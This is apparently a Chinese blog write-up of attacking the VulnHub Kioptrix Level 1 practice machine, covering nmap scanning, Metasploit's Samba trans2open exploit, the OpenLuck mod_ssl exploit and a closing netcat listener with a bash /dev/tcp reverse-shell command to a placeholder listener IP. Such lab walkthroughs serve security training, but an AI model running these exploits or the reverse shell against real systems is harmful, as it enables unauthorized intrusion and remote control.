【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录

前言

KIOPTRIX: LEVEL 1 是VulnHub发布的一个WEB靶场,难易程度:易。

靶场下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

打靶记录

信息收集

先使用nmap收集目标的ip地址,可以发现存活的靶机所使用的IP。

nmap -sP 192.168.101.0/24
图片[1] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

扫描目标靶机开放端口,结果如图所示。

nmap -A -p- 192.168.101.20
图片[2] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

这时我们发现服务器的139端口开放,是samba服务。我们使用msf框架探测一下samba服务的版本,使用的模块是:auxiliary/scanner/smb/smb_version

msfconsole
msf6 > use auxiliary/scanner/smb/smb_version      
msf6 auxiliary(scanner/smb/smb_version) > show options 
图片[3] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

设置一下模块的参数,rhosts为目标主机,然后输入run运行这个模块。可以发现Samba的版本为 2.2.1a,这是一个存在漏洞的samba版本!

msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.101.20
rhosts => 192.168.101.20
msf6 auxiliary(scanner/smb/smb_version) > run
图片[4] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

漏洞利用

samba漏洞利用

利用msf框架对这个samba漏洞进行利用,使用msf搜索samba,使用 exploit/linux/samba/trans2open 这个模块,注意一下这个模块可以使用的版本为Samba 2.2.x - Bruteforce

图片[5] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell
图片[6] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

设置一下相关参数:payload、rhosts (目标主机),然后直接运行模块,可以发现运行成功RCE了,输入任意命令即可发现命令被执行。

图片[7] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell
图片[8] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

mod_ssl缓冲区溢出

从nmap探测结果我们发现了几个地方,除了Samba之外,目标主机的apache服务(443端口),使用了OpenSSL的0.9版本,使用的内核模块为mod_ssl/2.8.4,这个模块的早期漏洞较多,我们也可以尝试进行利用

图片[9] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

为了防止修改代码麻烦,直接将利用脚本从github上下载下来,脚本地址:https://github.com/heltonWernik/OpenLuck

图片[10] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

然后运行这个脚本需要装一个libssl-dev的依赖:apt-get install libssl-dev

图片[11] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

对利用漏洞的源码进行编译

图片[12] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

编译完成之后会出现一个绿色的可执行文件,然后我们执行一下,可以发现部分提示信息,根据提示信息执行脚本即可

图片[13] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

利用编译好的文件,成功反弹回shell,执行命令:whoami,查看当前用户为apache

图片[14] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell

权限获取

利用Samba打回来的shell直接是root权限,我们只需要反弹个shell即可,首先kali(监听机)监听端口:nc -lvvp 1234,然后在samba利用脚本的界面执行反射shell命令:bash -i >& /dev/tcp/<监听机IP>/1234 0>&1

图片[15] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell
图片[16] - 【靶机实战】VulnHub KIOPTRIX: LEVEL 1 打靶记录 - 极核GetShell
THE END
想说的话 1  网站运营艰难(真的难),以真心❤️换真心💕,如果帮助到你,可以 开通金贝会员 支持一下本站!
2  请不要进行任何非授权的网络攻击,如果造成任何损失均由使用者本人负责,与本站和原作者无关!
点赞79 分享
茶谈区 共1条

请登录后发表评论